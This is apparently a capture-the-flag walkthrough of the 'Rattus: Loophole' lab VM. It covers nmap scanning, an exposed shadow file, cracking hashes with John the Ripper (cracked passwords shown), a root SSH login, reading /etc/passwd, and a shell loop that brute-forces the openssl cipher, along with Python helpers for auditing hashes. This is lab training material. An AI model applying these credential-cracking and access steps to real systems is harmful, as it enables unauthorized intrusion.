Rattus: Loophole – Walkthrough

Even though I have a lot to do, I keep trying to learn more about security holes. The description of this VM mentions openssl encryption. I already had some experience with openssl decryption on De-ICE 100, so what is different about openssl on this box? Let's try to find the encrypted message.

Target IP is 10.8.7.2.

┌─[[email protected]]─[~]
└──> nmap 10.8.7.* -sn -n

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-08 13:15 +0630
Nmap scan report for 10.8.7.1
Host is up (0.00041s latency).
MAC Address: 00:50:56:C0:00:02 (VMware)
Nmap scan report for 10.8.7.2
Host is up (0.00030s latency).
MAC Address: 00:0C:29:07:50:58 (VMware)
Nmap scan report for 10.8.7.30
Host is up (0.00014s latency).
MAC Address: 00:50:56:E0:77:E0 (VMware)
Nmap scan report for 10.8.7.3
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.96 seconds

Do you know how important nmap is? For me, the next step is to scan the target again with nmap, this time for service versions.

┌─[[email protected]]─[~]
└──> nmap -sV 10.8.7.2

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-08 13:17 +0630
Nmap scan report for 10.8.7.2
Host is up (0.0021s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.4 (protocol 1.99)
80/tcp  open  http        Apache httpd 1.3.31 ((Unix) PHP/4.4.4)
113/tcp open  ident?
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:07:50:58 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 160.96 seconds

Next, explore port 80 and brute-force directories with DirBuster.

I checked all the links and found a shadow file at the garbage URL.

http://10.8.7.2/garbage

root:$1$x2YBL0KB$E7QI7AF9ZeiqcfMRQ4KZ11:15018:0:::::
smmsp:!!:9797:0:::::
mysql:!!:9797:0:::::
rpc:!!:9797:0:::::
sshd:!!:9797:0:::::
apache:!!:9797:0:::::
nobody:!!:9797:0:::::
mhog:$1$ZQAbXwf3$TgcNjljKW.2tlJw4OICDr1:15019:0:::::0
tskies:$1$ZvNtdn0x$ck5hnAwXg.OLQPOtg28Hb.:15019:0:::::0

Great, a nice catch. Next, crack the shadow file with John the Ripper.

┌─[[email protected]]─[~/Desktop/tools/shadowcracker]
└──> ls -al
total 20
drwxr-xr-x 2 root root 4096 Jan  8 12:42 .
drwxr-xr-x 8 root root 4096 Jan  2 12:29 ..
-rwxrwxrwx 1 root root  367 Dec 25 18:37 formatshadow.py
-rw-rw-rw- 1 root root  164 Jan  8 12:41 raw.txt
-rw-r--r-- 1 root root  223 Jan  8 12:42 shadow
┌─[[email protected]]─[~/Desktop/tools/shadowcracker]
└──> cat raw.txt 
root:$1$x2YBL0KB$E7QI7AF9ZeiqcfMRQ4KZ11:15018:0:::::0
mhog:$1$ZQAbXwf3$TgcNjljKW.2tlJw4OICDr1:15019:0:::::0
tskies:$1$ZvNtdn0x$ck5hnAwXg.OLQPOtg28Hb.:15019:0:::::0
┌─[[email protected]]─[~/Desktop/tools/shadowcracker]
└──> john --show shadow 
root:albatros:500:500:,,,:/home/root:/bin/bash
tskies:nostradamus:502:500:,,,:/home/tskies:/bin/bash

2 password hashes cracked, 1 left
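As an added example (not the page's formatshadow.py, which is not shown), here is a Python audit of a shadow fragment like the one above: it separates locked accounts from crackable ones, reads the crypt(3) id and salt out of each hash, flags the weak algorithms, and converts the last-change day to a date. The sample lines are copied from the page; the `$1$` prefix is md5crypt, a fast hash with no work factor, which is why john needed only minutes. Function names are mine.

```python
"""Audit /etc/shadow-style lines: which accounts hold crackable hashes, which
algorithm/salt each uses, and how old the password is.

Added example for this walkthrough; it is not the page's formatshadow.py.
SAMPLE_SHADOW is constructed from the shadow fragment shown on the page.
"""
from datetime import date, timedelta
from typing import Dict, List, Optional

# crypt(3) modular-format ids.  "$1$" (md5crypt) is what this box uses.
CRYPT_IDS = {
    "1": "md5crypt",
    "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "sha256crypt",
    "6": "sha512crypt",
    "y": "yescrypt",
}
# Fast, unsalted-cost hashes that a modern cracker brute-forces at high speed.
WEAK_ALGOS = {"md5crypt", "descrypt"}

SAMPLE_SHADOW = """\
root:$1$x2YBL0KB$E7QI7AF9ZeiqcfMRQ4KZ11:15018:0:::::
smmsp:!!:9797:0:::::
mysql:!!:9797:0:::::
mhog:$1$ZQAbXwf3$TgcNjljKW.2tlJw4OICDr1:15019:0:::::0
tskies:$1$ZvNtdn0x$ck5hnAwXg.OLQPOtg28Hb.:15019:0:::::0
"""


def classify_hash(field: str) -> Dict[str, Optional[str]]:
    """Describe the password field (field 2) of one shadow entry."""
    if field == "":
        return {"state": "no-password", "algo": None, "salt": None}
    if field.startswith(("!", "*")):
        return {"state": "locked", "algo": None, "salt": None}
    if not field.startswith("$"):
        # 13-character traditional DES crypt: the first two chars are the salt.
        return {"state": "crackable", "algo": "descrypt", "salt": field[:2]}
    parts = field.split("$")[1:]          # drop the empty string before the first "$"
    algo = CRYPT_IDS.get(parts[0], "unknown-id-" + parts[0])
    if algo == "bcrypt":
        # $2b$<cost>$<22-char salt><31-char hash>: cost sits where the salt would be.
        salt = parts[2][:22] if len(parts) > 2 else None
    else:
        # sha256/sha512crypt may carry an optional "rounds=N" before the salt.
        idx = 2 if len(parts) > 2 and parts[1].startswith("rounds=") else 1
        salt = parts[idx] if len(parts) > idx else None
    return {"state": "crackable", "algo": algo, "salt": salt}


def lastchg_date(days_since_epoch: str) -> Optional[date]:
    """Field 3 is the day of the last password change, counted from 1970-01-01."""
    if not days_since_epoch:
        return None
    return date(1970, 1, 1) + timedelta(days=int(days_since_epoch))


def parse_shadow(text: str) -> List[Dict]:
    """Parse every non-empty line into a dict; shadow lines always have 9 fields."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 9:
            raise ValueError(f"expected 9 colon-separated fields: {line!r}")
        info = classify_hash(fields[1])
        entries.append({"user": fields[0], "hash": fields[1],
                        "lastchg": lastchg_date(fields[2]), **info})
    return entries


def crackable_entries(text: str) -> List[Dict]:
    return [e for e in parse_shadow(text) if e["state"] == "crackable"]


def weak_hash_users(text: str) -> List[str]:
    """Accounts whose hash algorithm should be migrated (sha512crypt/yescrypt/bcrypt)."""
    return [e["user"] for e in crackable_entries(text) if e["algo"] in WEAK_ALGOS]


def cracker_input(text: str) -> str:
    """user:hash lines, the minimal form password crackers accept (other fields are ignored)."""
    return "\n".join(f'{e["user"]}:{e["hash"]}' for e in crackable_entries(text))


if __name__ == "__main__":
    for e in parse_shadow(SAMPLE_SHADOW):
        print(f'{e["user"]:8} {e["state"]:12} {e["algo"] or "-":12} '
              f'salt={e["salt"] or "-":10} lastchg={e["lastchg"]}')
```

On the page's fragment all three real users carry md5crypt hashes last changed in February 2011; an audit script like this is the quick way to spot such accounts before an attacker does.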

After a few minutes of cracking I had the root password, so I logged in over SSH.

┌─[✗]─[[email protected]]─[~/Desktop/tools/shadowcracker]
└──> ssh [email protected]




           ===========================================================
                             WELCOME TO RATTUS LABS
           ===========================================================

                You've been connected to loophole.rattus.lab 

              To access the system you must use valid credentials.

           ===========================================================




[email protected]'s password: 
Last login: Mon Jan  8 12:43:31 2018 from 10.8.7.3






   ===========================================================
                     WELCOME TO RATTUS LABS
   ===========================================================

      I'm here to serve you MASTER ... 

   ===========================================================


[[email protected]]$  cat /etc/passwd
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:/bin/false
ftp:x:14:50::/home/ftp:/bin/false
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/false
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:/bin/false
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
apache:x:80:80:User for Apache:/srv/httpd:/bin/false
messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false
haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false
pop:x:90:90:POP:/:/bin/false
nobody:x:99:99:nobody:/:/bin/false
mhog:x:500:100:Mark Hog,+38599112911,,Ilica 13:/home/mhog:/bin/bash
tskies:x:501:100:Tom Skies,+38599911112,,Ilica 17:/home/tskies:/bin/bash
jsummer:x:502:0:Jay Summer,+38598112911,,Ilica 7:/home/jsummer:/bin/bash

The login succeeded and I found a Private.doc.enc file. Yes, this file needs to be decrypted with a password. I tried both cracked passwords on it. Since the encrypted file sits in tskies's home folder, I used tskies's password and wrote a small shell script to find the algorithm.

#!/bin/bash
# crack.sh: try every cipher openssl knows with the known password. A wrong
# cipher/mode fails the padding check and makes openssl exit non-zero, so the
# first clean exit names the algorithm.
# "openssl list-cipher-commands" is the OpenSSL 1.0 syntax; OpenSSL 1.1 and
# later spell it "openssl list -cipher-commands".
ciphers=$(openssl list-cipher-commands)
for i in $ciphers; do
    if openssl enc -d -"${i}" -in Private.doc.enc -k nostradamus > /dev/null 2>&1; then
        echo "Cipher is $i: openssl enc -d -${i} -in Private.doc.enc -k nostradamus -out priv.doc"
        exit 0
    fi
done
echo "no cipher accepted the password" >&2
exit 1

After running it, I got the decrypted file.

[[email protected]]$  ./crack.sh 
Cipher is aes-256-cbc: openssl enc -d -aes-256-cbc -in Private.doc.enc -k nostradamus -out priv.doc
[[email protected]]$  openssl enc -d -aes-256-cbc -in Private.doc.enc -k nostradamus -out priv.doc
error writing output file
[[email protected]]$  ls 
Desktop/  Private.doc.enc  crack.sh*  priv.doc  temp/
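To show what the loop above is actually testing, here is an added Python example (not from the walkthrough) of the `openssl enc` file layout and key derivation: the 8-byte `Salted__` header followed by an 8-byte salt, EVP_BytesToKey with MD5 (the OpenSSL 1.0-era default that `-k` used on a box this old; OpenSSL 1.1.0 switched the default digest to SHA-256 and 1.1.1 added `-pbkdf2`), and the PKCS#7 padding check whose failure is the non-zero exit the script keys on. It also classifies which cipher names give a usable exit status: `-cbc` and `-ecb` modes pad and verify, while `-cfb`/`-ofb`/`-ctr` and rc4 do not, so the loop could report a wrong cipher if one of those came first in the list. The sample bytes are constructed and the function names are mine.

```python
"""What `openssl enc -k <password>` produces, and why a cipher-guessing loop
keyed on the exit status works for some modes and not others.

Added example; not code from the walkthrough. Sample bytes are constructed.
Assumes OpenSSL 1.0-era defaults: EVP_BytesToKey with MD5, one iteration.
"""
import hashlib
from typing import Callable, Tuple

MAGIC = b"Salted__"   # 8-byte header openssl enc writes before the 8-byte salt


def split_openssl_file(data: bytes) -> Tuple[bytes, bytes]:
    """Return (salt, ciphertext) from an `openssl enc -salt` output file."""
    if len(data) < 16 or data[:8] != MAGIC:
        raise ValueError("not an openssl enc password-encrypted file (no Salted__ header)")
    return data[8:16], data[16:]


def evp_bytes_to_key(password: bytes, salt: bytes, key_len: int, iv_len: int,
                     md: Callable = hashlib.md5, count: int = 1) -> Tuple[bytes, bytes]:
    """EVP_BytesToKey: D_i = H^count(D_{i-1} || password || salt), with D_0 empty,
    concatenated until key_len + iv_len bytes are available."""
    out, prev = b"", b""
    while len(out) < key_len + iv_len:
        d = prev + password + salt
        for _ in range(count):
            d = md(d).digest()
        out += d
        prev = d
    return out[:key_len], out[key_len:key_len + iv_len]


def pkcs7_padding_ok(plaintext: bytes, block_size: int = 16) -> bool:
    """The check openssl enc performs on the last block of a -cbc/-ecb decryption.
    With a wrong key the last block is pseudorandom, so this fails with
    probability about 255/256: that failure is the 'bad decrypt' non-zero exit."""
    if not plaintext or len(plaintext) % block_size:
        return False
    n = plaintext[-1]
    return 1 <= n <= block_size and plaintext.endswith(bytes([n]) * n)


# Modes that pad (and so verify) versus modes that never fail on a wrong key.
PADDED_MODE_SUFFIXES = ("-cbc", "-ecb")
UNPADDED_MARKERS = ("-cfb", "-ofb", "-ctr", "rc4", "chacha20")
NOT_A_CIPHER = ("base64", "zlib")


def exit_status_is_an_oracle(cipher_name: str) -> bool:
    """True when a non-zero exit from `openssl enc -d -<cipher>` reliably means
    'wrong key or wrong cipher'. For unpadded modes the decrypt always 'succeeds'."""
    name = cipher_name.lower()
    if name in NOT_A_CIPHER:
        return False
    if any(name.endswith(s) for s in PADDED_MODE_SUFFIXES):
        return True
    if any(m in name for m in UNPADDED_MARKERS):
        return False
    # Bare names such as "bf", "des3" or "aes128" are CBC aliases in openssl enc.
    return True


def make_header(salt: bytes) -> bytes:
    """Constructed example header: what the first 16 bytes of Private.doc.enc look like."""
    assert len(salt) == 8
    return MAGIC + salt


if __name__ == "__main__":
    salt = bytes(range(8))                       # constructed salt
    key, iv = evp_bytes_to_key(b"nostradamus", salt, 32, 16)   # aes-256-cbc sizes
    print("header:", make_header(salt).hex())
    print("key:   ", key.hex())
    print("iv:    ", iv.hex())
    for c in ("aes-256-cbc", "aes-256-cfb", "bf", "rc4", "base64"):
        print(f"{c:12} exit-status oracle: {exit_status_is_an_oracle(c)}")
```

Two practical consequences follow from this: the salt lives in the clear at the front of the file, so the password is the only secret, and a guessing loop should either restrict itself to padded modes or confirm the result by checking the output (file type, readable content) rather than trusting the exit status alone.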

I uploaded the file and viewed it with an online document viewer.

The PDF can be downloaded here: priv

Thanks for reading. Happy Hacking.